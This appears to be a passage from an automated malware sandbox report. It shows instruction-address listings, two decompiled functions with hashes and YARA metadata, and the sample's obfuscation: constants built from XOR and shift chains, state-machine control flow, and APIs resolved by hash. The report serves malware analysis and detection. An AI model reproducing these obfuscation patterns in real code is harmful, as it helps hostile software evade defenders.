                                                                                                                          0x007a4778
                                                                                                                          0x007a4780
                                                                                                                          0x007a4788
                                                                                                                          0x007a4793
                                                                                                                          0x007a4798
                                                                                                                          0x007a479e
                                                                                                                          0x007a47a3
                                                                                                                          0x007a47ab
                                                                                                                          0x007a47b8
                                                                                                                          0x007a47bb
                                                                                                                          0x007a47bf
                                                                                                                          0x007a47c7
                                                                                                                          0x007a47cf
                                                                                                                          0x007a47d7
                                                                                                                          0x007a47db
                                                                                                                          0x007a47e0
                                                                                                                          0x007a47e1
                                                                                                                          0x007a47e5
                                                                                                                          0x007a47ed
                                                                                                                          0x007a47f5
                                                                                                                          0x007a4803
                                                                                                                          0x007a4807
                                                                                                                          0x007a480f
                                                                                                                          0x007a481c
                                                                                                                          0x007a4820
                                                                                                                          0x007a4828
                                                                                                                          0x007a4830
                                                                                                                          0x007a4838
                                                                                                                          0x007a4840
                                                                                                                          0x007a4848
                                                                                                                          0x007a4850
                                                                                                                          0x007a4858
                                                                                                                          0x007a4862
                                                                                                                          0x007a4866
                                                                                                                          0x007a486e
                                                                                                                          0x007a4876
                                                                                                                          0x007a487e
                                                                                                                          0x007a4886
                                                                                                                          0x007a488e
                                                                                                                          0x007a489b
                                                                                                                          0x007a489f
                                                                                                                          0x007a48a7
                                                                                                                          0x007a48af
                                                                                                                          0x007a48b4
                                                                                                                          0x007a48b9
                                                                                                                          0x007a48c1
                                                                                                                          0x007a48c9
                                                                                                                          0x007a48d1
                                                                                                                          0x007a48d9
                                                                                                                          0x007a48e1
                                                                                                                          0x007a48e9
                                                                                                                          0x007a48f1
                                                                                                                          0x007a48f9
                                                                                                                          0x007a4901
                                                                                                                          0x007a4909
                                                                                                                          0x007a4910
                                                                                                                          0x007a4915
                                                                                                                          0x007a491d
                                                                                                                          0x007a4925
                                                                                                                          0x007a492d
                                                                                                                          0x007a4935
                                                                                                                          0x007a4944
                                                                                                                          0x007a4947
                                                                                                                          0x007a494b
                                                                                                                          0x007a4955
                                                                                                                          0x007a4959
                                                                                                                          0x007a4961
                                                                                                                          0x007a4969
                                                                                                                          0x007a4971
                                                                                                                          0x007a4976
                                                                                                                          0x007a497e
                                                                                                                          0x007a498e
                                                                                                                          0x007a4992
                                                                                                                          0x007a499a
                                                                                                                          0x007a49a2
                                                                                                                          0x007a49aa
                                                                                                                          0x007a49b2
                                                                                                                          0x007a49ba
                                                                                                                          0x007a49bf
                                                                                                                          0x007a49c7
                                                                                                                          0x007a49cf
                                                                                                                          0x007a49d7
                                                                                                                          0x007a49df
                                                                                                                          0x007a49eb
                                                                                                                          0x007a49ee
                                                                                                                          0x007a49f2
                                                                                                                          0x007a49f6
                                                                                                                          0x007a49fa
                                                                                                                          0x007a4a03
                                                                                                                          0x007a4a0b
                                                                                                                          0x007a4a13
                                                                                                                          0x007a4a18
                                                                                                                          0x007a4a20
                                                                                                                          0x007a4a28
                                                                                                                          0x007a4a28
                                                                                                                          0x007a4a28
                                                                                                                          0x007a4a2b
                                                                                                                          0x007a4a3d
                                                                                                                          0x007a4b36
                                                                                                                          0x007a4b3b
                                                                                                                          0x007a4b3d
                                                                                                                          0x007a4b42
                                                                                                                          0x007a4b44
                                                                                                                          0x00000000
                                                                                                                          0x007a4b44
                                                                                                                          0x007a4a43
                                                                                                                          0x007a4a49
                                                                                                                          0x007a4b16
                                                                                                                          0x00000000
                                                                                                                          0x007a4a4f
                                                                                                                          0x007a4a55
                                                                                                                          0x007a4af9
                                                                                                                          0x007a4aff
                                                                                                                          0x007a4b07
                                                                                                                          0x007a4b04
                                                                                                                          0x007a4b04
                                                                                                                          0x007a4b0c
                                                                                                                          0x007a4b0f
                                                                                                                          0x00000000
                                                                                                                          0x007a4a5b
                                                                                                                          0x007a4a61
                                                                                                                          0x007a4aea
                                                                                                                          0x007a4aef
                                                                                                                          0x007a4af2
                                                                                                                          0x00000000
                                                                                                                          0x007a4a63
                                                                                                                          0x007a4a65
                                                                                                                          0x007a4ab7
                                                                                                                          0x007a4abe
                                                                                                                          0x007a4ac4
                                                                                                                          0x007a4ac7
                                                                                                                          0x007a4acc
                                                                                                                          0x007a4ace
                                                                                                                          0x007a4acf
                                                                                                                          0x007a4acf
                                                                                                                          0x00000000
                                                                                                                          0x007a4a67
                                                                                                                          0x007a4a6d
                                                                                                                          0x007a4b71
                                                                                                                          0x007a4b77
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a4a73
                                                                                                                          0x007a4a8f
                                                                                                                          0x007a4a91
                                                                                                                          0x007a4a9b
                                                                                                                          0x007a4aa0
                                                                                                                          0x00000000
                                                                                                                          0x007a4aa0
                                                                                                                          0x007a4a6d
                                                                                                                          0x007a4a65
                                                                                                                          0x007a4a61
                                                                                                                          0x007a4a55
                                                                                                                          0x007a4a49
                                                                                                                          0x007a4b86
                                                                                                                          0x007a4b86
                                                                                                                          0x007a4b5c
                                                                                                                          0x007a4b61
                                                                                                                          0x007a4b64
                                                                                                                          0x007a4b69
                                                                                                                          0x007a4b70
                                                                                                                          0x00000000
                                                                                                                          0x007a4b70

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ^T$mU`
                                                                                                                          • API String ID: 0-1245783925
                                                                                                                          • Opcode ID: 14a0216aa58d837f0d17bc661d19bf9ab9851ba03476a8c36cb2a798597eedc7
                                                                                                                          • Instruction ID: ed038b7e96c1551f06a98fa14fbcb7022272703615eb4e0b40b2ca1435bc04c5
                                                                                                                          • Opcode Fuzzy Hash: 14a0216aa58d837f0d17bc661d19bf9ab9851ba03476a8c36cb2a798597eedc7
                                                                                                                          • Instruction Fuzzy Hash: 4FB130715093409FC358CF65898A41BFBE1FBC9758F108A1DF69AA6260D3B5CA49CF83
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007AA666 Relevance: 2.7, Strings: 2, Instructions: 214COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 88%
                                                                                                                          			E007AA666(intOrPtr* __ecx) {
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				void* _t185;
				void* _t187;
				signed int _t194;
				signed int _t203;
				intOrPtr* _t204;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				void* _t236;
				signed int _t239;
				signed int* _t240;

				_t204 = __ecx;
				_t240 =  &_v208;
				_v144 = __ecx;
				_v188 = 0x57b051;
				_v188 = _v188 ^ 0x0e33ee27;
				_v188 = _v188 * 0x1d;
				_t236 = 0xac5721c;
				_v188 = _v188 << 4;
				_v188 = _v188 ^ 0x15e508b7;
				_v156 = 0xb3c586;
				_v156 = _v156 + 0xc4f5;
				_v156 = _v156 ^ 0x00bed25a;
				_v168 = 0x711032;
				_v168 = _v168 << 8;
				_v168 = _v168 + 0x5169;
				_v168 = _v168 ^ 0x711dace8;
				_v192 = 0xa2549d;
				_v192 = _v192 + 0x52ae;
				_v192 = _v192 >> 1;
				_v192 = _v192 >> 3;
				_v192 = _v192 ^ 0x000eb53b;
				_v140 = 0xe7e5a1;
				_t231 = 0x32;
				_v140 = _v140 * 0x50;
				_v140 = _v140 ^ 0x4874e895;
				_v208 = 0x1967bb;
				_v208 = _v208 << 4;
				_v208 = _v208 | 0x201d9a42;
				_v208 = _v208 / _t231;
				_v208 = _v208 ^ 0x00a7f54f;
				_v152 = 0x52a7fc;
				_v152 = _v152 + 0x45a2;
				_v152 = _v152 ^ 0x0052edd3;
				_v160 = 0x3027b3;
				_v160 = _v160 + 0xfd14;
				_v160 = _v160 ^ 0x0036c553;
				_v180 = 0x38862e;
				_v180 = _v180 ^ 0x0f350481;
				_t232 = 0x7c;
				_v180 = _v180 * 0x65;
				_v180 = _v180 ^ 0xf053ee57;
				_v136 = 0x356a19;
				_v136 = _v136 ^ 0xbed63dcb;
				_v136 = _v136 ^ 0xbeeb3706;
				_v164 = 0x14aaf;
				_v164 = _v164 + 0xffffc1af;
				_v164 = _v164 ^ 0x000285a1;
				_v200 = 0x7f3e04;
				_v200 = _v200 * 0x53;
				_v200 = _v200 + 0xffffdc1b;
				_v200 = _v200 + 0x69f9;
				_v200 = _v200 ^ 0x2945b47b;
				_v148 = 0xc6ed1e;
				_v148 = _v148 >> 6;
				_v148 = _v148 ^ 0x0006dab0;
				_v172 = 0x6d07b9;
				_v172 = _v172 / _t232;
				_t233 = 0x35;
				_v172 = _v172 / _t233;
				_v172 = _v172 ^ 0x00041e3e;
				_v204 = 0x57aab;
				_v204 = _v204 + 0xdcdc;
				_v204 = _v204 * 0x48;
				_v204 = _v204 << 8;
				_v204 = _v204 ^ 0xc89fb5e3;
				_v132 = 0xff84eb;
				_v132 = _v132 << 5;
				_v132 = _v132 ^ 0x1ff23c26;
				_v196 = 0xcb0ee1;
				_v196 = _v196 | 0xd8d8bfc1;
				_v196 = _v196 << 4;
				_v196 = _v196 ^ 0x8dbe7284;
				_v184 = 0x3f345e;
				_t234 = 0x7b;
				_v184 = _v184 * 0x5e;
				_v184 = _v184 ^ 0x1738d684;
				_v176 = 0x75d12f;
				_t239 = _v184;
				_t203 = _v184;
				_t235 = _v184;
				_v176 = _v176 / _t234;
				_v176 = _v176 + 0xb925;
				_v176 = _v176 ^ 0x0007fac1;
				while(1) {
					L1:
					_t185 = 0x80ddafd;
					do {
						while(_t236 != 0x3002390) {
							if(_t236 == _t185) {
								_push(_v204);
								_push(_v172);
								_t187 = E007ADCF7(_v148, 0x791540, __eflags);
								_push(_t235);
								_push( &_v128);
								_push(_t187);
								_push(_t239);
								_push(_t203);
								 *((intOrPtr*)(E0079A42D(0xab2a8d8a, 0x2b7)))();
								E0079A8B0(_v132, _t187, _v196);
								_t236 = 0xc2d90a2;
								goto L11;
							} else {
								if(_t236 == 0x94501ee) {
									_t194 = E007A0AE0(0x10, 1);
									_push(_v140);
									_t239 = _t194;
									_push( &_v128);
									_push(_t239);
									_push(0xb);
									E007980E3(_v168, _v192);
									_t236 = 0x3002390;
									L11:
									_t240 =  &(_t240[6]);
									L12:
									_t204 = _v144;
									goto L1;
								} else {
									if(_t236 == 0xac5721c) {
										_t236 = 0x94501ee;
										continue;
									} else {
										if(_t236 == 0xc2d90a2) {
											E007A8519(_v184, _v176, _t235);
										} else {
											if(_t236 != 0xd4e1cec) {
												goto L17;
											} else {
												_t239 = 0x4000;
												_push(_t204);
												_push(_t204);
												_t203 = E00797FF2(0x4000);
												_t185 = 0x80ddafd;
												_t204 = _v144;
												_t236 =  !=  ? 0x80ddafd : 0xc2d90a2;
												continue;
											}
										}
									}
								}
							}
							L20:
							return _t203;
						}
						_t235 = E00794816(_v208,  *((intOrPtr*)(_t204 + 4)), _v152,  *_t204, _v160, _v180);
						_t240 =  &(_t240[4]);
						__eflags = _t235;
						if(__eflags == 0) {
							_t204 = _v144;
							_t236 = 0x99c1651;
							_t185 = 0x80ddafd;
							goto L17;
						} else {
							_t236 = 0xd4e1cec;
							goto L12;
						}
						goto L20;
						L17:
						__eflags = _t236 - 0x99c1651;
					} while (__eflags != 0);
					goto L20;
				}
			}





































                                                                                                                          0x007aa666
                                                                                                                          0x007aa666
                                                                                                                          0x007aa670
                                                                                                                          0x007aa674
                                                                                                                          0x007aa67e
                                                                                                                          0x007aa68b
                                                                                                                          0x007aa68f
                                                                                                                          0x007aa694
                                                                                                                          0x007aa699
                                                                                                                          0x007aa6a1
                                                                                                                          0x007aa6a9
                                                                                                                          0x007aa6b1
                                                                                                                          0x007aa6b9
                                                                                                                          0x007aa6c1
                                                                                                                          0x007aa6c6
                                                                                                                          0x007aa6ce
                                                                                                                          0x007aa6d6
                                                                                                                          0x007aa6de
                                                                                                                          0x007aa6e6
                                                                                                                          0x007aa6ea
                                                                                                                          0x007aa6ef
                                                                                                                          0x007aa6f7
                                                                                                                          0x007aa706
                                                                                                                          0x007aa709
                                                                                                                          0x007aa70d
                                                                                                                          0x007aa715
                                                                                                                          0x007aa71d
                                                                                                                          0x007aa722
                                                                                                                          0x007aa732
                                                                                                                          0x007aa736
                                                                                                                          0x007aa73e
                                                                                                                          0x007aa746
                                                                                                                          0x007aa74e
                                                                                                                          0x007aa756
                                                                                                                          0x007aa75e
                                                                                                                          0x007aa766
                                                                                                                          0x007aa76e
                                                                                                                          0x007aa776
                                                                                                                          0x007aa783
                                                                                                                          0x007aa786
                                                                                                                          0x007aa78a
                                                                                                                          0x007aa792
                                                                                                                          0x007aa79a
                                                                                                                          0x007aa7a2
                                                                                                                          0x007aa7aa
                                                                                                                          0x007aa7b2
                                                                                                                          0x007aa7ba
                                                                                                                          0x007aa7c2
                                                                                                                          0x007aa7cf
                                                                                                                          0x007aa7d3
                                                                                                                          0x007aa7db
                                                                                                                          0x007aa7e3
                                                                                                                          0x007aa7eb
                                                                                                                          0x007aa7f3
                                                                                                                          0x007aa7f8
                                                                                                                          0x007aa800
                                                                                                                          0x007aa810
                                                                                                                          0x007aa818
                                                                                                                          0x007aa81b
                                                                                                                          0x007aa81f
                                                                                                                          0x007aa827
                                                                                                                          0x007aa82f
                                                                                                                          0x007aa83c
                                                                                                                          0x007aa842
                                                                                                                          0x007aa847
                                                                                                                          0x007aa84f
                                                                                                                          0x007aa857
                                                                                                                          0x007aa85c
                                                                                                                          0x007aa864
                                                                                                                          0x007aa86c
                                                                                                                          0x007aa874
                                                                                                                          0x007aa879
                                                                                                                          0x007aa881
                                                                                                                          0x007aa890
                                                                                                                          0x007aa891
                                                                                                                          0x007aa895
                                                                                                                          0x007aa89d
                                                                                                                          0x007aa8ab
                                                                                                                          0x007aa8af
                                                                                                                          0x007aa8b3
                                                                                                                          0x007aa8b7
                                                                                                                          0x007aa8bb
                                                                                                                          0x007aa8c3
                                                                                                                          0x007aa8cb
                                                                                                                          0x007aa8cb
                                                                                                                          0x007aa8cb
                                                                                                                          0x007aa8d0
                                                                                                                          0x007aa8d0
                                                                                                                          0x007aa8de
                                                                                                                          0x007aa983
                                                                                                                          0x007aa98c
                                                                                                                          0x007aa994
                                                                                                                          0x007aa99b
                                                                                                                          0x007aa9a7
                                                                                                                          0x007aa9a8
                                                                                                                          0x007aa9a9
                                                                                                                          0x007aa9aa
                                                                                                                          0x007aa9b6
                                                                                                                          0x007aa9c2
                                                                                                                          0x007aa9c7
                                                                                                                          0x00000000
                                                                                                                          0x007aa8e4
                                                                                                                          0x007aa8ea
                                                                                                                          0x007aa952
                                                                                                                          0x007aa957
                                                                                                                          0x007aa95f
                                                                                                                          0x007aa969
                                                                                                                          0x007aa96a
                                                                                                                          0x007aa96b
                                                                                                                          0x007aa96d
                                                                                                                          0x007aa972
                                                                                                                          0x007aa977
                                                                                                                          0x007aa977
                                                                                                                          0x007aa97a
                                                                                                                          0x007aa97a
                                                                                                                          0x00000000
                                                                                                                          0x007aa8ec
                                                                                                                          0x007aa8f2
                                                                                                                          0x007aa93f
                                                                                                                          0x00000000
                                                                                                                          0x007aa8f4
                                                                                                                          0x007aa8fa
                                                                                                                          0x007aaa1d
                                                                                                                          0x007aa900
                                                                                                                          0x007aa906
                                                                                                                          0x00000000
                                                                                                                          0x007aa90c
                                                                                                                          0x007aa910
                                                                                                                          0x007aa91f
                                                                                                                          0x007aa920
                                                                                                                          0x007aa926
                                                                                                                          0x007aa930
                                                                                                                          0x007aa936
                                                                                                                          0x007aa93a
                                                                                                                          0x00000000
                                                                                                                          0x007aa93a
                                                                                                                          0x007aa906
                                                                                                                          0x007aa8fa
                                                                                                                          0x007aa8f2
                                                                                                                          0x007aa8ea
                                                                                                                          0x007aaa26
                                                                                                                          0x007aaa2f
                                                                                                                          0x007aaa2f
                                                                                                                          0x007aa9e8
                                                                                                                          0x007aa9ea
                                                                                                                          0x007aa9ed
                                                                                                                          0x007aa9ef
                                                                                                                          0x007aa9f8
                                                                                                                          0x007aa9fc
                                                                                                                          0x007aaa01
                                                                                                                          0x00000000
                                                                                                                          0x007aa9f1
                                                                                                                          0x007aa9f1
                                                                                                                          0x00000000
                                                                                                                          0x007aa9f1
                                                                                                                          0x00000000
                                                                                                                          0x007aaa06
                                                                                                                          0x007aaa06
                                                                                                                          0x007aaa06
                                                                                                                          0x00000000
                                                                                                                          0x007aaa12

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ^4?$iQ
                                                                                                                          • API String ID: 0-3971506469
                                                                                                                          • Opcode ID: f7c20ef400bfa0675bbb76efb4786e472a1da45e483af38b8dda373c46284851
                                                                                                                          • Instruction ID: 407f9626fdc8ab64400f0f7affda7ce3dacd728d4a61e49ad7fc90628d08d414
                                                                                                                          • Opcode Fuzzy Hash: f7c20ef400bfa0675bbb76efb4786e472a1da45e483af38b8dda373c46284851
                                                                                                                          • Instruction Fuzzy Hash: 83A152719083409FC354CF29D58990BFBE1BBC5758F408A2DF99AA6260C7B9D949CF83
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A8BE3 Relevance: 2.7, Strings: 2, Instructions: 204COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 82%
                                                                                                                          			E007A8BE3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _v88;
				intOrPtr _v92;
				signed int _t203;
				short _t206;
				short _t211;
				signed int _t214;
				void* _t216;
				intOrPtr _t238;
				void* _t239;
				void* _t240;
				short* _t241;
				short* _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				void* _t251;

				_v92 = 0x476c75;
				asm("stosd");
				_t216 = 0xb7209d2;
				_t243 = 0x73;
				asm("stosd");
				asm("stosd");
				_t238 =  *0x7b3e10; // 0x0
				_v16 = 0xe95677;
				_t239 = _t238 + 0x1c;
				_v16 = _v16 + 0xffffde88;
				_v16 = _v16 | 0xcd71b475;
				_v16 = _v16 + 0xffffb9cf;
				_v16 = _v16 ^ 0xcdf0e35f;
				_v48 = 0xdf79ef;
				_v48 = _v48 / _t243;
				_t244 = 0x6b;
				_v48 = _v48 * 0x6d;
				_v48 = _v48 ^ 0x00d012e0;
				_v20 = 0x9de8b4;
				_v20 = _v20 + 0xffff612d;
				_v20 = _v20 / _t244;
				_v20 = _v20 ^ 0xc642351f;
				_v20 = _v20 ^ 0xc646a40f;
				_v52 = 0x8fb5bf;
				_v52 = _v52 << 0xa;
				_v52 = _v52 | 0x07a5acc8;
				_v52 = _v52 ^ 0x3ff13d54;
				_v68 = 0x5451dc;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x054b95e9;
				_v56 = 0x52bd8b;
				_v56 = _v56 >> 2;
				_t245 = 0x43;
				_v56 = _v56 * 0x7a;
				_v56 = _v56 ^ 0x09d97bb2;
				_v24 = 0x3d3b88;
				_v24 = _v24 / _t245;
				_v24 = _v24 + 0xfffff551;
				_v24 = _v24 ^ 0x58fd9949;
				_v24 = _v24 ^ 0x58f7485b;
				_v28 = 0x8d7fa4;
				_v28 = _v28 | 0x74f1f66b;
				_v28 = _v28 + 0xbcb0;
				_t246 = 0x1d;
				_v28 = _v28 / _t246;
				_v28 = _v28 ^ 0x0406308a;
				_v76 = 0xb13dbd;
				_v76 = _v76 >> 4;
				_v76 = _v76 ^ 0x0001a54a;
				_v72 = 0x3dff58;
				_v72 = _v72 + 0xffff5d9c;
				_v72 = _v72 ^ 0x00301633;
				_v8 = 0xd63a62;
				_v8 = _v8 >> 4;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0xdca434f7;
				_v8 = _v8 ^ 0xdd0cf0dc;
				_v44 = 0x6f20d8;
				_v44 = _v44 >> 0xb;
				_v44 = _v44 ^ 0xaa766a49;
				_v44 = _v44 ^ 0xaa79f73d;
				_v64 = 0x5810b3;
				_t247 = 0x3e;
				_v64 = _v64 * 0x13;
				_v64 = _v64 ^ 0x068d2e2f;
				_v60 = 0xa1705b;
				_v60 = _v60 / _t247;
				_v60 = _v60 ^ 0x000746d3;
				_v12 = 0xe49076;
				_v12 = _v12 | 0xf94b921d;
				_t248 = 0x66;
				_v12 = _v12 / _t248;
				_v12 = _v12 | 0x30c6fb91;
				_v12 = _v12 ^ 0x32fd72cc;
				_v40 = 0x4af1f5;
				_v40 = _v40 + 0xffff1f3a;
				_v40 = _v40 + 0x5998;
				_v40 = _v40 | 0x0efc634a;
				_v40 = _v40 ^ 0x0ef1d3e1;
				_v36 = 0xca0e2e;
				_v36 = _v36 + 0xa6ab;
				_v36 = _v36 * 0x17;
				_v36 = _v36 | 0xed84f45f;
				_v36 = _v36 ^ 0xffb3e96f;
				_v32 = 0x9f068d;
				_v32 = _v32 | 0xccdcedf7;
				_v32 = _v32 >> 8;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0xdfe821c7;
				do {
					while(_t216 != 0x5ccdb59) {
						if(_t216 == 0x80e5149) {
							_push(_v32);
							_push(_t239);
							_push(3);
							_push(1);
							E007980E3(_v40, _v36);
							 *((short*)(_t239 + 6)) = 0;
							return 0;
						}
						if(_t216 == 0xb7209d2) {
							_t211 = E007AD25E(_t216);
							_t216 = 0x5ccdb59;
							continue;
						}
						if(_t216 != 0xeb2e9e3) {
							goto L8;
						}
						_t214 = E007A0AE0(0x10, 4);
						_push(_v12);
						_t250 = _t214;
						_push(_t239);
						_push(_t250);
						_push(1);
						E007980E3(_v64, _v60);
						_t251 = _t251 + 0x18;
						_t242 = _t239 + _t250 * 2;
						_t216 = 0x80e5149;
						_t211 = 0x2e;
						 *_t242 = _t211;
						_t239 = _t242 + 2;
					}
					_t203 = E007A0AE0(0x10, 4);
					_push(_v24);
					_t249 = _t203;
					_push(_t239);
					_push(1);
					_push(2);
					E007980E3(_v68, _v56);
					_push(_v72);
					_t240 = _t239 + 2;
					_push(_t240);
					_push(_t249);
					_push(1);
					E007980E3(_v28, _v76);
					_t251 = _t251 + 0x28;
					_t241 = _t240 + _t249 * 2;
					_t216 = 0xeb2e9e3;
					_t206 = 0x5c;
					 *_t241 = _t206;
					_t239 = _t241 + 2;
					L8:
				} while (_t216 != 0x3f21c37);
				return _t211;
			}










































                                                                                                                          0x007a8be9
                                                                                                                          0x007a8bf9
                                                                                                                          0x007a8bfa
                                                                                                                          0x007a8c01
                                                                                                                          0x007a8c04
                                                                                                                          0x007a8c05
                                                                                                                          0x007a8c06
                                                                                                                          0x007a8c0c
                                                                                                                          0x007a8c13
                                                                                                                          0x007a8c16
                                                                                                                          0x007a8c1d
                                                                                                                          0x007a8c24
                                                                                                                          0x007a8c2b
                                                                                                                          0x007a8c32
                                                                                                                          0x007a8c40
                                                                                                                          0x007a8c47
                                                                                                                          0x007a8c4a
                                                                                                                          0x007a8c4d
                                                                                                                          0x007a8c54
                                                                                                                          0x007a8c5b
                                                                                                                          0x007a8c69
                                                                                                                          0x007a8c6c
                                                                                                                          0x007a8c73
                                                                                                                          0x007a8c7a
                                                                                                                          0x007a8c81
                                                                                                                          0x007a8c85
                                                                                                                          0x007a8c8c
                                                                                                                          0x007a8c93
                                                                                                                          0x007a8c9a
                                                                                                                          0x007a8c9e
                                                                                                                          0x007a8ca5
                                                                                                                          0x007a8cac
                                                                                                                          0x007a8cb4
                                                                                                                          0x007a8cb7
                                                                                                                          0x007a8cba
                                                                                                                          0x007a8cc1
                                                                                                                          0x007a8ccf
                                                                                                                          0x007a8cd2
                                                                                                                          0x007a8cd9
                                                                                                                          0x007a8ce0
                                                                                                                          0x007a8ce7
                                                                                                                          0x007a8cee
                                                                                                                          0x007a8cf5
                                                                                                                          0x007a8cff
                                                                                                                          0x007a8d02
                                                                                                                          0x007a8d05
                                                                                                                          0x007a8d0c
                                                                                                                          0x007a8d13
                                                                                                                          0x007a8d17
                                                                                                                          0x007a8d1e
                                                                                                                          0x007a8d25
                                                                                                                          0x007a8d2c
                                                                                                                          0x007a8d33
                                                                                                                          0x007a8d3a
                                                                                                                          0x007a8d3e
                                                                                                                          0x007a8d42
                                                                                                                          0x007a8d49
                                                                                                                          0x007a8d50
                                                                                                                          0x007a8d57
                                                                                                                          0x007a8d5b
                                                                                                                          0x007a8d64
                                                                                                                          0x007a8d6b
                                                                                                                          0x007a8d78
                                                                                                                          0x007a8d7b
                                                                                                                          0x007a8d7e
                                                                                                                          0x007a8d85
                                                                                                                          0x007a8d93
                                                                                                                          0x007a8d96
                                                                                                                          0x007a8d9d
                                                                                                                          0x007a8da4
                                                                                                                          0x007a8dae
                                                                                                                          0x007a8db1
                                                                                                                          0x007a8db4
                                                                                                                          0x007a8dbb
                                                                                                                          0x007a8dc2
                                                                                                                          0x007a8dc9
                                                                                                                          0x007a8dd0
                                                                                                                          0x007a8dd7
                                                                                                                          0x007a8dde
                                                                                                                          0x007a8de5
                                                                                                                          0x007a8dec
                                                                                                                          0x007a8df7
                                                                                                                          0x007a8dfa
                                                                                                                          0x007a8e01
                                                                                                                          0x007a8e08
                                                                                                                          0x007a8e0f
                                                                                                                          0x007a8e16
                                                                                                                          0x007a8e1a
                                                                                                                          0x007a8e1e
                                                                                                                          0x007a8e25
                                                                                                                          0x007a8e25
                                                                                                                          0x007a8e33
                                                                                                                          0x007a8ef3
                                                                                                                          0x007a8efc
                                                                                                                          0x007a8efd
                                                                                                                          0x007a8eff
                                                                                                                          0x007a8f01
                                                                                                                          0x007a8f0b
                                                                                                                          0x00000000
                                                                                                                          0x007a8f0b
                                                                                                                          0x007a8e3f
                                                                                                                          0x007a8e8c
                                                                                                                          0x007a8e91
                                                                                                                          0x00000000
                                                                                                                          0x007a8e91
                                                                                                                          0x007a8e47
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a8e57
                                                                                                                          0x007a8e5c
                                                                                                                          0x007a8e62
                                                                                                                          0x007a8e67
                                                                                                                          0x007a8e68
                                                                                                                          0x007a8e69
                                                                                                                          0x007a8e6b
                                                                                                                          0x007a8e70
                                                                                                                          0x007a8e73
                                                                                                                          0x007a8e76
                                                                                                                          0x007a8e7d
                                                                                                                          0x007a8e7e
                                                                                                                          0x007a8e81
                                                                                                                          0x007a8e81
                                                                                                                          0x007a8ea2
                                                                                                                          0x007a8ea7
                                                                                                                          0x007a8ead
                                                                                                                          0x007a8eb2
                                                                                                                          0x007a8eb3
                                                                                                                          0x007a8eb5
                                                                                                                          0x007a8eb7
                                                                                                                          0x007a8ebc
                                                                                                                          0x007a8ec2
                                                                                                                          0x007a8ec8
                                                                                                                          0x007a8ec9
                                                                                                                          0x007a8eca
                                                                                                                          0x007a8ecc
                                                                                                                          0x007a8ed1
                                                                                                                          0x007a8ed4
                                                                                                                          0x007a8ed7
                                                                                                                          0x007a8ede
                                                                                                                          0x007a8edf
                                                                                                                          0x007a8ee2
                                                                                                                          0x007a8ee5
                                                                                                                          0x007a8ee5
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ulG$wV
                                                                                                                          • API String ID: 0-391097709
                                                                                                                          • Opcode ID: b9e0d252ff158ac3f6cd29ac6509df0288fe14b0c99cb0a6914e03152cd0da55
                                                                                                                          • Instruction ID: 3b229cb78f3460aeb588d18614567ad9147c89b6d4011a4e9b0a2f5db7b1af5d
                                                                                                                          • Opcode Fuzzy Hash: b9e0d252ff158ac3f6cd29ac6509df0288fe14b0c99cb0a6914e03152cd0da55
